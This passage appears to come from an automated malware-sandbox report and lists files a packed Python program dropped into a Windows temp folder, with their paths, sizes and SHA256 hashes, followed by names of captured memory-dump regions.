                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\base_library.zip
                                            • Size 1.4MB
                                            • SHA256 9bfb2d1e218f74b2ca46929b786b92825245fbe200289dd7e7934ddacfb9c1e6
                                            • MD5 SHA1 SHA512 SSDEEP

                                            freetype.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\freetype.dll
                                            • Size 639KB
                                            • SHA256 1c487392d6d06970ba3c7b52705881f1fb069f607243499276c2f0c033c7df6f
                                            • MD5 SHA1 SHA512 SSDEEP

                                            libcrypto-1_1.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\libcrypto-1_1.dll
                                            • Size 3.3MB
                                            • SHA256 9b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939
                                            • MD5 SHA1 SHA512 SSDEEP

                                            libcrypto-3-x64.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\libcrypto-3-x64.dll
                                            • Size 4.9MB
                                            • SHA256 80e747426ec7f703a2d745ae545e3c0fb4c2198e44eb2fcefb7d9e98890adb29
                                            • MD5 SHA1 SHA512 SSDEEP

                                            libffi-8.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\libffi-8.dll
                                            • Size 38KB
                                            • SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
                                            • MD5 SHA1 SHA512 SSDEEP

                                            libjpeg-9.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\libjpeg-9.dll
                                            • Size 238KB
                                            • SHA256 3a224af540c96574800f5e9acf64b2cdfb9060e727919ec14fbd187a9b5bfe69
                                            • MD5 SHA1 SHA512 SSDEEP

                                            libmodplug-1.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\libmodplug-1.dll
                                            • Size 259KB
                                            • SHA256 0c1a9032812ec4c20003a997423e67b71ecb5e59d62cdc18a5bf591176a9010e
                                            • MD5 SHA1 SHA512 SSDEEP

                                            libmysql.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\libmysql.dll
                                            • Size 6.7MB
                                            • SHA256 55b06743360b14c24d4f40fef6cd42b6c0f0be779bf8aefe6904f16b66bc5e48
                                            • MD5 SHA1 SHA512 SSDEEP

                                            python3.DLL

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\python3.DLL
                                            • Size 65KB
                                            • SHA256 95086ac060ffe6933ac04a6aa289b1c7d321f14380315e24ba0d6c4adfa0842b
                                            • MD5 SHA1 SHA512 SSDEEP

                                            python311.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\python311.dll
                                            • Size 5.5MB
                                            • SHA256 c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400
                                            • MD5 SHA1 SHA512 SSDEEP

                                            ucrtbase.dll

                                            • Path C:\Users\Admin\AppData\Local\Temp\_MEI48282\ucrtbase.dll
                                            • Size 992KB
                                            • SHA256 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
                                            • MD5 SHA1 SHA512 SSDEEP

                                            __PSScriptPolicyTest_vmhxv3v4.ugf.ps1

                                            • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmhxv3v4.ugf.ps1
                                            • Size 60B
                                            • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                            • MD5 SHA1 SHA512

                                            memory/2680-1307-0x00007FFD024F0000-0x00007FFD02FB1000-memory.dmp

                                            memory/2680-1302-0x000002C8F5790000-0x000002C8F57B2000-memory.dmp

                                            memory/2680-1304-0x00007FFD024F0000-0x00007FFD02FB1000-memory.dmp

                                            memory/2680-1303-0x00007FFD024F0000-0x00007FFD02FB1000-memory.dmp

                                            memory/2680-1292-0x00007FFD024F3000-0x00007FFD024F5000-memory.dmp

                                            memory/3976-1322-0x00007FFD09100000-0x00007FFD0A45D000-memory.dmp

                                            memory/3976-1291-0x000001A1577F0000-0x000001A1577F1000-memory.dmp